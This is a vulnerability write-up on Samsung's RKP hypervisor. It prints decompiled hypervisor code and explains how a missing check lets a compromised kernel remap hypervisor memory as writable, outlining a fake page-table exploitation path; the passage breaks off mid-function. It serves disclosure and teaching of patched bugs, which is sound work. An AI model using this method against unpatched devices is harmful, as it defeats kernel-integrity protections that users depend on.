Disclaimer
This work was done while we were working at Longterm Security and they have kindly allowed us to release the article on our company's blog.
This is a follow-up to our compendium blog post that presented the internals of Samsung's security hypervisor, including all the nitty-gritty details. This extensive knowledge is put to use in today's blog post that explains how we attacked Samsung RKP. After revealing three vulnerabilities leading to the compromise of the hypervisor or of its assurances, we also describe the exploitation paths we came up with. Finally, we take a look at the patches made by Samsung following our report.
In January 2021, we reported three vulnerabilities in Samsung's security hypervisor implementation. Each of the vulnerabilities has a different impact, from writing to hypervisor-enforced read-only memory to compromising the hypervisor itself. The vulnerabilities were fixed in the June 2021 and October 2021 security updates. While they are specific to Samsung RKP, we think that they are good examples of what you should be keeping an eye out for if you're auditing a security hypervisor running on an ARMv8 device.
We will detail each of the vulnerabilities, explain how they can be exploited, and also take a look at their patch. While we recommend reading the original blog post because it will make it easier to understand this one, we tried to summarize all the important bits in the introduction. Feel free to skip the introduction and go directly to the first vulnerability if you are already familiar with Samsung RKP.
The main goal of a security hypervisor on a mobile device is to ensure kernel integrity at run time, so that even if an attacker finds a kernel vulnerability, they won't be able to modify sensitive kernel data structures, elevate privileges, or execute malicious code. In order to do that, the hypervisor is executing at a higher privilege level (EL2) than the kernel (EL1), and it can have complete control over it by making use of the virtualization extensions.
One of the features of the virtualization extensions is a second layer of address translation. When it is disabled, there is only one layer of address translation, which translates a Virtual Address (VA) directly into a Physical Address (PA). But when it is enabled, the first layer (stage 1 - under control of the kernel) now translates a VA into what is called an Intermediate Physical Address (IPA), and the second layer (stage 2 - under control of the hypervisor) translates this IPA into the real PA. This second layer has its own memory attributes, allowing the hypervisor to enforce memory permissions that differ from the ones in the kernel page tables as well as disable access to some physical memory regions.
Another feature of the virtualization extensions, enabled by the use of the Hypervisor Configuration Register (HCR), allows the hypervisor to handle general exceptions and to trap critical operations usually performed by the kernel (such as accessing system registers). Finally, in the cases where the kernel (EL1) needs to call into the hypervisor (EL2), it can do so by executing an HyperVisor Call (HVC) instruction. This is very similar to the SuperVisor Call (SVC) instruction that is used by userland processes (EL0) to call into the kernel (EL1).
Samsung's implementation of a security hypervisor enforces that:
PXNTable
bit is set;.rodata
region (read-only);cred
, task_security_struct
, vfsmount
) are allocated on read-only pages;system
cannot suddenly become system
or root
;cred
field of a task_struct
in an exploit;root
from outside of specific mount points;Samsung RKP makes extensive use of two data structures: memlists and sparsemaps.
std::vector
).std::map
).There are multiple instances of these control structures, listed below by order of initialization:
dynamic_regions
contains the DRAM regions (sent by S-Boot);protected_ranges
contains critical hypervisor SRAM/DRAM regions;physmap
associates a type (kernel text, PT, etc.) to each DRAM page;ro_bitmap
indicates if a DRAM page is read-only in the stage 2;dbl_bitmap
is used by the kernel to detect double-mapped DRAM pages;page_allocator.list
contains the DRAM region used by RKP's page allocator;page_allocator.map
tracks DRAM pages allocated by RKP's page allocator;executable_regions
contains the kernel's executable pages;dynamic_load_regions
is used by the "dynamic load" feature.Please note that these control structures are used by the hypervisor to keep track of what is in memory and how it is mapped. But they have no direct impact on the actual address translation (unlike the stage 2 page tables). The hypervisor has to carefully keep the control structures and page tables in sync to avoid issues.
The hypervisor has multiple allocators, each serving a different purpose:
The initialization of the hypervisor (alongside the kernel) is detailed in the first blog post. It is crucial when looking for vulnerabilities to know what the state of the various control structures is at a given moment, as well as what the page tables for the stage 2 at EL1 and stage 1 at EL2 contain. The hypervisor state after initialization is reported below.
The control structures are as follows:
protected_ranges
contain the hypervisor code/data and the memory backing the physmap
.physmap
,.text
segment is marked as TEXT
;L1
, L2
, and L3
, respectively;KERNEL|L1
, KERNEL|L2
, and KERNEL|L3
, respectively.ro_bitmap
contains the kernel .text
and .rodata
segments, and other pages that have been made read-only in the stage 2 (like the L1, L2, and some of the L3 kernel page tables).executable_regions
contain the kernel .text
segment and trampoline page.In the page tables of the EL2 stage 1 (controlling what the hypervisor can access):
.text
segment is mapped as RO;swapper_pg_dir
is mapped as RW.In the page tables of the EL1 stage 2 (controlling what the kernel can really access):
empty_zero_page
is mapped as RWX;executable_regions
.executable_regions
..text
segment is mapped as ROX.Our test device during this research was a Samsung A51 (SM-A515F). Instead of using a full exploit chain, we have downloaded the kernel source code from Samsung's Open Source website, added a few syscalls, recompiled the kernel, and flashed it onto the device.
The new syscalls make it really convenient to interact with RKP and allow us from userland to:
uh_call
function).SVE-2021-20178 (CVE-2021-25415): Possible remapping RKP memory as writable from EL1
Severity: High
Affected versions: Q(10.0), R(11.0) devices with Exynos9610, 9810, 9820, 9830
Reported on: January 4, 2021
Disclosure status: Privately disclosed.
Assuming EL1 is compromised, an improper address validation in RKP prior to SMR JUN-2021 Release 1 allows local attackers to remap EL2 memory as writable.
The patch adds the proper address validation in RKP to prevent change of EL2 memory attribution from EL1.
When Samsung RKP needs to change the permissions of a memory region in the stage 2, it uses either rkp_s2_page_change_permission
which operates on a single page, or rkp_s2_range_change_permission
which operates on a range of addresses. These functions can be abused to remap hypervisor memory (that was unmapped during initialization) as writable from the kernel, thus fully compromising the security hypervisor. Let's see what happens under the hood when these functions are called.
rkp_s2_page_change_permission
starts by performing verifications on its arguments: unless the allow
flag is non-zero, the hypervisor must be initialized, the page must not be marked as S2UNMAP
in the physmap
, it must not come from the hypervisor page allocator, and it cannot be in the kernel .text
or .rodata
sections. If these verifications succeed, it determines the requested memory attributes and calls map_s2_page
to effectively modify the stage 2 page tables. Finally, it flushes the TLBs and updates the writability of the page in the ro_bitmap
.
int64_t rkp_s2_page_change_permission(void* p_addr, uint64_t access, uint32_t exec, uint32_t allow) {
// ...
// If the allow flag is 0, RKP must be initialized.
if (!allow && !rkp_inited) {
uh_log('L', "rkp_paging.c", 574, "s2 page change access not allowed before init %d", allow);
rkp_policy_violation("s2 page change access not allowed, p_addr : %p", p_addr);
return -1;
}
// The page shouldn't be marked as `S2UNMAP` in the physmap.
if (is_phys_map_s2unmap(p_addr)) {
// And trigger a violation.
rkp_policy_violation("Error page was s2 unmapped before %p", p_addr);
return -1;
}
// The page shouldn't have been allocated by the hypervisor page allocator.
if (page_allocator_is_allocated(p_addr) == 1) {
return 0;
}
// The page shouldn't be in the kernel text section.
if (p_addr >= TEXT_PA && p_addr < ETEXT_PA) {
return 0;
}
// The page shouldn't be in the kernel rodata section.
if (p_addr >= rkp_get_pa(SRODATA) && p_addr < rkp_get_pa(ERODATA)) {
return 0;
}
uh_log('L', "rkp_paging.c", 270, "Page access change out of static RO range %lx %lx %lx", p_addr, access, exec);
// Calculate the memory attributes to apply to the page.
if (access == 0x80) {
++page_ro;
attrs = UNKN1 | READ;
} else {
++page_free;
attrs = UNKN1 | WRITE | READ;
}
if (p_addr == ZERO_PG_ADDR || exec) {
attrs |= EXEC;
}
// Call `map_s2_page` to make the actual changes to the stage 2 page tables.
if (map_s2_page(p_addr, p_addr, 0x1000, attrs) < 0) {
rkp_policy_violation("map_s2_page failed, p_addr : %p, attrs : %d", p_addr, attrs);
return -1;
}
// Invalidate the TLBs for the target page.
tlbivaae1is(((p_addr + 0x80000000) | 0xffffffc000000000) >> 12);
// Call `rkp_set_pgt_bitmap` to update the ro_bitmap.
return rkp_set_pgt_bitmap(p_addr, access);
}
rkp_s2_range_change_permission
operates similarly to rkp_s2_page_change_permission
. The first differences are the verifications performed by the function. Here the allow
flag can take 3 values: 0 (changes are only allowed after initialization), 1 (only before deferred initialization), and 2 (always allowed). The start and end address must be page aligned and in the expected order. No other verifications are performed. The second difference is the function called to perform the changes to the stage 2 page tables, which is s2_map
and not map_s2_page
.
int64_t rkp_s2_range_change_permission(uint64_t start_addr,
uint64_t end_addr,
uint64_t access,
uint32_t exec,
uint32_t allow) {
// ...
uh_log('L', "rkp_paging.c", 195, "RKP_4acbd6db%lxRKP_00950f15%lx", start_addr, end_addr);
// If the allow flag is 0, RKP must be initialized.
if (!allow && !rkp_inited) {
uh_log('L', "rkp_paging.c", 593, "s2 range change access not allowed before init");
rkp_policy_violation("Range change permission prohibited");
}
// If the allow flag is 1, RKP must not be deferred initialized.
else if (allow != 2 && rkp_deferred_inited) {
uh_log('L', "rkp_paging.c", 603, "s2 change access not allowed after def-init");
rkp_policy_violation("Range change permission prohibited");
}
// The start and end addresses must be page-aligned.
if ((start_addr & 0xfff) != 0 || (end_addr & 0xfff) != 0) {
uh_log('L', "rkp_paging.c", 203, "start or end addr is not aligned, %p - %p", start_addr, end_addr);
return -1;
}
// The start address must be smaller than the end address.
if (start_addr > end_addr) {
uh_log('L', "rkp_paging.c", 208, "start addr is bigger than end addr %p, %p", start_addr, end_addr);
return -1;
}
// Calculates the memory attributes to apply to the pages.
size = end_addr - start_addr;
if (access == 0x80) {
attrs = UNKN1 | READ;
} else {
attrs = UNKN1 | WRITE | READ;
}
if (exec) {
attrs |= EXEC;
}
p_addr_start = start_addr;
// Call `s2_map` to make the actual changes to the stage 2 page tables.
if (s2_map(start_addr, end_addr - start_addr, attrs, &p_addr_start) < 0) {
uh_log('L', "rkp_paging.c", 222, "s2_map returned false, p_addr_start : %p, size : %p", p_start_addr, size);
return -1;
}
// For each page, call `rkp_set_pgt_bitmap` to update the ro_bitmap and invalidate the TLBs.
for (addr = start_addr, addr < end_addr; addr += 0x1000) {
res = rkp_set_pgt_bitmap(addr, access);
if (res < 0) {
uh_log('L', "rkp_paging.c", 229, "set_pgt_bitmap fail, %p", addr);
return res;
}
tlbivaae1is(((addr + 0x80000000) | 0xffffffc000000000) >> 12);
addr += 0x1000;
}
return 0;
}
s2_map
is a wrapper around map_s2_page
that takes into account the various block and page sizes that make up the memory range. map_s2_page
does not use any of the control structures. It won't be detailed in this blog post as it is generic code for walking and updating the stage 2 page tables.
int64_t s2_map(uint64_t orig_addr, uint64_t orig_size, attrs_t attrs, uint64_t* paddr) {
// ...
if (!paddr) {
return -1;
}
// Floor the address to the page size.
addr = orig_addr - (orig_addr & 0xfff);
// And ceil the size to the page size.
size = (orig_addr & 0xfff) + orig_size;
// Call `map_s2_page` for each 2 MB block in the region.
while (size > 0x1fffff && (addr & 0x1fffff) == 0) {
if (map_s2_page(*paddr, addr, 0x200000, attrs)) {
uh_log('L', "s2.c", 1132, "unable to map 2mb s2 page: %p", addr);
return -1;
}
size -= 0x200000;
addr += 0x200000;
*paddr += 0x200000;
}
// Call `map_s2_page` for each 4 KB page in the region.
while (size > 0xfff && (addr & 0xfff) == 0) {
if (map_s2_page(*paddr, addr, 0x1000, attrs)) {
uh_log('L', "s2.c", 1150, "unable to map 4kb s2 page: %p", addr);
return -1;
}
size -= 0x1000;
addr += 0x1000;
*paddr += 0x1000;
}
return 0;
}
We have seen that the rkp_s2_range_change_permission
function performs fewer verifications than rkp_s2_page_change_permission
. In particular, it doesn't ensure that the pages of the memory range are not marked as S2UNMAP
in the physmap
. That means that if we give it a memory range that contains hypervisor memory (unmapped during initialization), it will happily remap it in the second stage.
But it turns out that it is even worse than that: this check doesn't even do anything! One would expect a page to be marked as S2UNMAP
in the physmap
when it is actually unmapped from stage 2. s2_unmap
is the function that does this unmapping. Similarly to s2_map
, it is simply a wrapper around unmap_s2_page
that takes into account the various block and page sizes that make up the memory range.
int64_t s2_unmap(uint64_t orig_addr, uint64_t orig_size) {
// ...
// Floor the address to the page size.
addr = orig_addr & 0xfffffffffffff000;
// And ceil the size to the page size.
size = (orig_addr & 0xfff) + orig_size;
// Call `unmap_s2_page` for each 1 GB block in the region.
while (size > 0x3fffffff && (addr & 0x3fffffff) == 0) {
if (unmap_s2_page(addr, 0x40000000)) {
uh_log('L', "s2.c", 1175, "unable to unmap 1gb s2 page: %p", addr);
return -1;
}
size -= 0x40000000;
addr += 0x40000000;
}
// Call `unmap_s2_page` for each 2 MB block in the region.
while (size > 0x1fffff && (addr & 0x1fffff) == 0) {
if (unmap_s2_page(addr, 0x200000)) {
uh_log('L', "s2.c", 1183, "unable to unmap 2mb s2 page: %p", addr);
return -1;
}
size -= 0x200000;
addr += 0x200000;
}
// Call `unmap_s2_page` for each 4 KB page in the region.
while (size > 0xfff && (addr & 0xfff) == 0) {
if (unmap_s2_page(addr, 0x1000)) {
uh_log('L', "s2.c", 1191, "unable to unmap 4kb s2 page: %p", addr);
return -1;
}
size -= 0x1000;
addr += 0x1000;
}
return 0;
}
It turns out there are no calls to rkp_phys_map_set
, rkp_phys_map_set_region
, or even the low-level sparsemap_set_value_addr
function that ever mark a page as S2UNMAP
. Consequently, we can also use rkp_s2_page_change_permission
to remap hypervisor memory in the stage 2!
To exploit this two-fold bug, we need to look for calls to the rkp_s2_page_change_permission
and rkp_s2_range_change_permission
functions that can be triggered from the kernel (after the hypervisor has been initialized) and with controllable arguments.
rkp_s2_page_change_permission
is called:
rkp_l1pgt_process_table
;rkp_l2pgt_process_table
;rkp_l3pgt_process_table
;set_range_to_pxn_l3
(itself called from rkp_set_range_to_pxn
);set_range_to_rox_l3
(itself called from rkp_set_range_to_rox
);rkp_set_pages_ro
;rkp_ro_free_pages
.And rkp_s2_range_change_permission
is called:
dynamic_load_xxx
functions.Let's go over these functions one by one and see if they fit our requirements.
rkp_lxpgt_process_table
¶In the first blog post, we took a closer look at the functions rkp_l1pgt_process_table
, rkp_l2pgt_process_table
and rkp_l3pgt_process_table
. It is fairly easy to reach the call to rkp_s2_page_change_permission
in these functions, assuming that we control the third argument:
is_alloc
is equal to 1, the page must not be marked as LX
in the physmap
,LX
.is_alloc
is equal to 0, the page must be marked as LX
in the physmap
,FREE
.So by calling one of these functions twice, the first time with is_alloc
set to 1, and the second time with is_alloc
set to 0, it will result in a call to rkp_s2_page_change_permission
with read-write permissions. The next question is: can we call these functions with controlled arguments?
The function processing the level 1 tables, rkp_l1pgt_process_table
, is called:
rkp_l1pgt_ttbr
;rkp_l1pgt_new_pgd
;rkp_l1pgt_free_pgd
.The first call is in rkp_l1pgt_ttbr
, where the function arguments, ttbr
and user_or_kernel
, are user-controlled. Because we're attacking Samsung RKP after initialization, rkp_deferred_inited
and rkp_inited
should be true, and the MMU enabled. Then, if pgd
is the user PGD empty_zero_page
or a kernel PGD other than swapper_pg_dir
and tramp_pg_dir
, the rkp_l1pgt_process_table
function will be called.
int64_t rkp_l1pgt_ttbr(uint64_t ttbr, uint32_t user_or_kernel) {
// ...
// Extract the PGD from the TTBR system register value.
pgd = ttbr & 0xfffffffff000;
// Don't do any processing if RKP is not deferred initialized.
if (!rkp_deferred_inited) {
should_process = 0;
} else {
should_process = 1;
// For kernel PGDs or user PGDs that aren't `empty_zero_page`.
if (user_or_kernel == 0x1ffffff || pgd != ZERO_PG_ADDR) {
// Don't do any processing if RKP is not initialized.
if (!rkp_inited) {
should_process = 0;
}
// Or if it's the `swapper_pg_dir` kernel PGD.
if (pgd == INIT_MM_PGD) {
should_process = 0;
}
// Or it it's the `tramp_pg_dir` kernel PGD.
if (pgd == TRAMP_PGD && TRAMP_PGD) {
should_process = 0;
}
}
// For the `empty_zero_page` user PGD.
else {
// Don't do any processing if the MMU is disabled or RKP is not initialized.
if ((get_sctlr_el1() & 1) != 0 || !rkp_inited) {
should_process = 0;
}
}
}
// If processing of the PGD should be done, call `rkp_l1pgt_process_table`.
if (should_process && rkp_l1pgt_process_table(pgd, user_or_kernel, 1) < 0) {
return rkp_policy_violation("Process l1t returned false, l1e addr : %lx", pgd);
}
// Then set TTBR0_EL1 for user PGDs, or TTBR1_EL1 for kernel PGDs.
if (!user_or_kernel) {
return set_ttbr0_el1(ttbr);
} else {
return set_ttbr1_el1(ttbr);
}
}
However, the function will also set the system register TTBR0_EL1
(for user PGDs) or TTBR1_EL1
(for kernel PGDs), and we don't even have control of the is_alloc
argument, so this is not a good path. Let's take a look at our other options.
We have seen the rkp_l1pgt_new_pgd
and rkp_l1pgt_free_pgd
functions in the first blog post. They could have been very good candidates, but there is one major drawback to using them: the table address given to rkp_l1pgt_process_table
comes from rkp_get_pa
. This function calls check_kernel_input
to ensure the address is not in the protected_ranges
memlist, so we can't use addresses located in hypervisor memory.
Instead, what we can do is try to reach the processing of the next level table so that the value given to rkp_l2pgt_process_table
comes from a descriptor's output address and not from a call to rkp_get_pa
. This way, the table address argument will be fully user-controlled.
The function processing the level 2 tables, rkp_l2pgt_process_table
, is called:
rkp_l1pgt_process_table
;rkp_l1pgt_write
(seen in the first blog post).And the function processing the level 3 tables, rkp_l3pgt_process_table
, is called:
check_single_l2e
(seen in the first blog post, called from rkp_l2pgt_process_table
and rkp_l2pgt_write
).The rkp_l1pgt_write
and rkp_l2pgt_write
functions, which we have also seen in the first blog post, are very good candidates that allow calling rkp_l2pgt_process_table
and rkp_l3pgt_process_table
by writing in the kernel page tables a fake level 1 or level 2 descriptor, respectively.
For the sake of completeness, we will take a look at our other options even though we have already found an exploitation path for the vulnerability.
set_range_to_xxx_l3
¶set_range_to_pxn_l3
is called all the way from rkp_set_range_to_pxn
. This function calls rkp_set_range_to_pxn
, passing it the PGD as an argument, as well as the start and address of the range to set as PXN in the stage 1 page tables. It also invalidates the TLB and instruction cache.
int64_t rkp_set_range_to_pxn(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
// ...
// Call `set_range_to_pxn_l1` to walk the PGD and set PXN bit of the descriptors mapping the address range.
res = set_range_to_pxn_l1(table, start_addr, end_addr);
if (res) {
uh_log('W', "rkp_l1pgt.c", 186, "Fail to change attribute to pxn");
return res;
}
// Invalidate the TLBs for the memory region.
size = end_addr - start_addr;
invalidate_s1_el1_tlb_region(start_addr, size);
// Invalidate the instruction cache for the memory region.
paddr = rkp_get_pa(start_addr);
invalidate_instruction_cache_region(paddr, size);
return 0;
}
set_range_to_pxn_l1
ensures the PGD is marked as KERNEL|L1
in the physmap
. It then iterates over the descriptors that map the address range given as an argument and calls set_range_to_pxn_l2
on the table descriptors to process the PMDs.
int64_t set_range_to_pxn_l1(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
// ...
rkp_phys_map_lock(table);
// Ensure the PGD is marked as `KERNEL|L1` in the physmap.
if (is_phys_map_kernel(table) && is_phys_map_l1(table)) {
res = 0;
// Iterate over the PGD descriptors that map the address range.
for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
// Compute the start and end address of the region mapped by this descriptor.
next_end_addr = (next_start_addr & 0xffffffffc0000000) + 0x40000000;
if (next_end_addr > end_addr) {
next_end_addr = end_addr;
}
table_desc = *(table + 8 * ((next_start_addr >> 30) & 0x1ff));
// If the descriptor is a table descriptor.
if ((table_desc & 0b11) == 0b11) {
// Call `set_range_to_pxn_l2` to walk the PMD and set PXN bit of the descriptors mapping the address range.
res += set_range_to_pxn_l2(table_desc & 0xfffffffff000, next_start_addr, next_end_addr);
}
}
} else {
res = -1;
}
rkp_phys_map_unlock(table);
return res;
}
set_range_to_pxn_l2
ensures the PMD is marked as KERNEL|L2
in the physmap
. It then iterates over the descriptors that map the address range given as an argument and calls set_range_to_pxn_l3
on the table descriptors to process the PTs. In addition, if the descriptors don't map one of the executable regions, it sets their PXN bit.
int64_t set_range_to_pxn_l2(uint64_t table, uint64_t start_addr, int64_t end_addr) {
// ...
rkp_phys_map_lock(table);
// Ensure the PMD is marked as `KERNEL|L2` in the physmap.
if (is_phys_map_kernel(table) && is_phys_map_l2(table)) {
res = 0;
// Iterate over the PMD descriptors that map the address range.
for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
// Compute the start and end address of the region mapped by this descriptor.
next_end_addr = (next_start_addr & 0xffffffffffe00000) + 0x200000;
if (next_end_addr > end_addr) {
next_end_addr = end_addr;
}
table_desc_p = table + 8 * ((next_start_addr >> 21) & 0x1ff);
// Check if the descriptor value is in the executable regions. If it is not, set the PXN bit of the descriptor.
// However, I believe the mask extracting only the output address of the descriptor is missing...
if (*table_desc_p && !executable_regions_contains(*table_desc_p)) {
set_pxn_bit_of_desc(table_desc_p, 2);
}
// If the descriptor is a table descriptor.
if ((*table_desc_p & 0b11) == 0b11) {
// Call `set_range_to_pxn_l3` to walk the PT and set PXN bit of the descriptors mapping the address range.
res += set_range_to_pxn_l3(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
}
}
} else {
res = -1;
}
rkp_phys_map_unlock(table);
return res;
}
set_range_to_pxn_l3
checks if the PT is marked as KERNEL|L3
in the physmap
. If it is, the hypervisor stops protecting it by making it writable again in the second stage and marking it as FREE
in the physmap
. If it is not, it then iterates over the descriptors that map the address range given as an argument, and if they don't map one of the executable regions, it sets their PXN bit.
int64_t set_range_to_pxn_l3(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
// ...
rkp_phys_map_lock(table);
// Ensure the PT is marked as `KERNEL|L3` in the physmap.
if (is_phys_map_kernel(table) && is_phys_map_l3(table)) {
// Call `rkp_s2_page_change_permission` to make it writable in the second stage.
res = rkp_s2_page_change_permission(table, 0 /* read-write */, 0 /* non-executable */, 0);
if (res < 0) {
uh_log('L', "rkp_l3pgt.c", 153, "pxn l3t failed, %lx", table);
rkp_phys_map_unlock(table);
return res;
}
// Mark it as `FREE` in the physmap.
res = rkp_phys_map_set(table, FREE);
if (res < 0) {
rkp_phys_map_unlock(table);
return res;
}
}
// Iterate over the PT descriptors that map the address range.
for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
// Compute the start and end address of the region mapped by this descriptor.
next_end_addr = (next_start_addr + 0x1000) & 0xfffffffffffff000;
if (next_end_addr > end_addr) {
next_end_addr = end_addr;
}
table_desc_p = table + 8 * ((next_start_addr >> 12) & 0x1ff);
// If the descriptor is a page descriptor, and the descriptor value is not in the executable regions, then set its
// PXN bit. I believe the mask extracting only the output address of the descriptor is missing...
if ((*table_desc_p & 0b11) == 0b11 && !executable_regions_contains(*table_desc_p, 3)) {
set_pxn_bit_of_desc(table_desc_p, 3);
}
}
rkp_phys_map_unlock(table);
return 0;
}
rkp_set_range_to_pxn
is always called (from the "dynamic load" feature's functions) on swapper_pg_dir
. It will thus walk the kernel page tables and set the PXN bit of the block and page descriptors spanning over the specified address range. The call to rkp_s2_page_change_permission
that we are interested in only happens for level 3 tables that are also marked KERNEL|L3
in the physmap
.
It is not a good option for us for many reasons: our target page of hypervisor memory would need to be marked KERNEL|L3
in the physmap
; it requires that we have already written a user-controlled descriptor into the kernel page tables (bringing us back to the rkp_lxpgt_process_table
functions that we have seen above); and finally, the "dynamic load" feature is only available on Exynos devices, as we are going to see with the next vulnerability.
set_range_to_rox_l3
is called all the way from rkp_set_range_to_rox
. The rkp_set_range_to_rox
and set_range_to_rox_lx
functions are very similar to their PXN counterparts. rkp_set_range_to_rox
calls set_range_to_rox_l1
, passing it the PGD as an argument.
int64_t rkp_set_range_to_rox(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
// ...
// Call `set_range_to_pxn_l1` to walk the PGD and set the regions of the address range as ROX.
res = set_range_to_rox_l1(table, start_addr, end_addr);
if (res) {
uh_log('W', "rkp_l1pgt.c", 199, "Fail to change attribute to rox");
return res;
}
// Invalidate the TLBs for the memory region.
size = end_addr - start_addr;
invalidate_s1_el1_tlb_region(start_addr, size);
// Invalidate the instruction cache for the memory region.
paddr = rkp_get_pa(start_addr);
invalidate_instruction_cache_region(paddr, size);
return 0;
}
set_range_to_rox_l1
ensures the PGD is not swapper_pg_dir
and is marked as KERNEL|L1
in the physmap
. It then iterates over the descriptors that map the address range given as an argument and changes the memory attributes of these descriptors to make the memory read-only executable. In addition, for table descriptors, it calls set_range_to_rox_l2
to process the PMDs.
int64_t set_range_to_rox_l1(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
// ...
if (table != INIT_MM_PGD) {
rkp_policy_violation("rox only allowed on kerenl PGD! l1t : %lx", table);
return -1;
}
rkp_phys_map_lock(table);
// Ensure the PGD is marked as `KERNEL|L1` in the physmap.
if (is_phys_map_kernel(table) && is_phys_map_l1(table)) {
res = 0;
// Iterate over the PGD descriptors that map the address range.
for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
// Compute the start and end address of the region mapped by this descriptor.
next_end_addr = (next_start_addr & 0xffffffffc0000000) + 0x40000000;
if (next_end_addr > end_addr) {
next_end_addr = end_addr;
}
table_desc_p = table + 8 * ((next_start_addr >> 30) & 0x1ff);
// Set the AP bits to RO and unset the PXN bit of the descriptor.
if (*table_desc_p) {
set_rox_bits_of_desc(table_desc_p, 1);
}
// If the descriptor is a table descriptor.
if ((*table_desc_p & 0b11) == 0b11) {
// Call `set_range_to_rox_l2` to walk the PMD and set the regions of the address range as ROX.
res += set_range_to_rox_l2(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
}
}
} else {
res = -1;
}
rkp_phys_map_unlock(table);
return res;
}
set_range_to_rox_l2
ensures the PMD is marked as KERNEL|L2
in the physmap
. It then iterates over the descriptors that map the address range given as an argument and changes the memory attributes of these descriptors to make the memory read-only executable. In addition, for table descriptors, it calls set_range_to_rox_l3
to process the PTs.
int64_t set_range_to_rox_l2(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
// ...
rkp_phys_map_lock(table);
// Ensure the PMD is marked as `KERNEL|L2` in the physmap.
if (is_phys_map_kernel(table) && is_phys_map_l2(table)) {
// Iterate over the PMD descriptors that map the address range.
for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
// Compute the start and end address of the region mapped by this descriptor.
next_end_addr = (next_start_addr & 0xffffffffffe00000) + 0x200000;
if (next_end_addr > end_addr) {
next_end_addr = end_addr;
}
table_desc_p = table + 8 * ((next_start_addr >> 21) & 0x1ff);
// Set the AP bits to RO and unset the PXN bit of the descriptor.
if (*table_desc_p) {
set_rox_bits_of_desc(table_desc_p, 2);
}
// If the descriptor is a table descriptor.
if ((*table_desc_p & 0b11) == 0b11) {
res += set_range_to_rox_l3(*table_desc_p & 0xfffffffff000, next_start_addr, next_end_addr);
}
}
} else {
res = -1;
}
rkp_phys_map_unlock(table);
return res;
}
set_range_to_rox_l3
checks if the PT is marked as KERNEL|L3
in the physmap
. If it is not, the hypervisor starts protecting it by making it read-only in the second stage and marking it as KERNEL|L3
in the physmap
. If it is, it then iterates over the descriptors that map the address range given as an argument and changes the memory attributes of these descriptors to make the memory read-only and executable.
int64_t set_range_to_rox_l3(uint64_t table, uint64_t start_addr, uint64_t end_addr) {
// ...
rkp_phys_map_lock(table);
// Ensure the PT is NOT marked as `KERNEL|L3` in the physmap.
if (!is_phys_map_kernel(table) || !is_phys_map_l3(table)) {
// Call `rkp_s2_page_change_permission` to make it writable in the second stage.
res = rkp_s2_page_change_permission(table, 0x80 /* read-only */, 0 /* non-executable */, 0);
if (res < 0) {
uh_log('L', "rkp_l3pgt.c", 193, "rox l3t failed, %lx", table);
rkp_phys_map_unlock(table);
return res;
}
// Mark it as `KERNEL|L3` in the physmap.
res = rkp_phys_map_set(table, FLAG2 | KERNEL | L3);
if (res < 0) {
rkp_phys_map_unlock(table);
return res;
}
}
// Iterate over the PT descriptors that map the address range.
for (next_start_addr = start_addr; next_start_addr < end_addr; next_start_addr = next_end_addr) {
// Compute the start and end address of the region mapped by this descriptor.
next_end_addr = (next_start_addr + 0x1000) & 0xfffffffffffff000;
if (next_end_addr > end_addr) {
next_end_addr = end_addr;
}
table_desc_p = table + 8 * ((next_start_addr >> 12) & 0x1ff);
// If the descriptor is a page descriptor, set its AP bits to RO and unset its PXN bit.
if ((*table_desc_p & 3) == 3) {
set_rox_bits_of_desc(table_desc_p, 3);
}
}
rkp_phys_map_unlock(table);
return 0;
}
rkp_set_range_to_rox
is also always called (from the "dynamic load" feature's functions) on swapper_pg_dir
. It will thus walk the kernel page tables (stage 1) and change the memory attributes of the block and page descriptor spanning over the specified address range to make them read-only executable. The call to rkp_s2_page_change_permission
that we are interested in also only happens for level 3 tables, but only if they are not marked KERNEL|L3
in the physmap
.
It is not a good option either for us for similar reasons: the target page is set as read-only in the stage 2, it requires having already written a user-controlled descriptor into the kernel page tables, and the "dynamic load" feature is only present on Exynos devices.
The last 2 functions that call rkp_s2_page_change_permission
are rkp_set_pages_ro
and rkp_ro_free_pages
, which we have seen in the first blog post. Unfortunately, they give it as an argument an address that comes from a call to rkp_get_pa
, so they are unusable for our exploit.
Finally, rkp_s2_range_change_permission
, the function operating on an address range, is called from many dynamic_load_xxx
functions, but the "dynamic load" feature is only available on Exynos devices, and we would like to keep the exploit as generic as possible.
To exploit the vulnerability, we decided to use rkp_l1pgt_new_pgd
and rkp_l1pgt_free_pgd
. As mentioned previously, because these functions call rkp_l1pgt_process_table
with a physical address returned by rkp_get_pa
, we will be targeting the rkp_s2_range_change_permission
call in rkp_l2pgt_process_table
instead. To reach it, we need to give a "fake PGD" that contains a single descriptor pointing to a "fake PMD" (that will be overlapping with our target page in hypervisor memory) as input to the rkp_l1pgt_process_table
function.
+------------------+ .-> +------------------+
| | | | |
+------------------+ | +------------------+
| table descriptor ---' | |
+------------------+ +------------------+
| | | |
+------------------+ +------------------+
| | | |
+------------------+ +------------------+
"fake PMD" "fake PUD"
in kernel memory in hypervisor memory
The first step of the exploit is to call the rkp_cmd_new_pgd
command handler, which simply calls rkp_l1pgt_new_pgd
. It itself calls rkp_l1pgt_process_table
, which will process our "fake PGD" (in the code below, high_bits
will be 0 and is_alloc
will be 1). Most specifically, it will set our "fake PMD" as L1
in physmap
, set it as read-only in the stage 2, then call rkp_l2pgt_process_table
to process our "fake PMD".
int64_t rkp_l1pgt_process_table(int64_t pgd, uint32_t high_bits, uint32_t is_alloc) {
// ...
rkp_phys_map_lock(pgd);
// If we are introducing this PGD.
if (is_alloc) {
// If it is already marked as a PGD in the physmap, return without processing it.
if (is_phys_map_l1(pgd)) {
rkp_phys_map_unlock(pgd);
return 0;
}
// ...
// And mark the PGD as such in the physmap.
res = rkp_phys_map_set(pgd, type /* L1 */);
// ...
// Make the PGD read-only in the second stage.
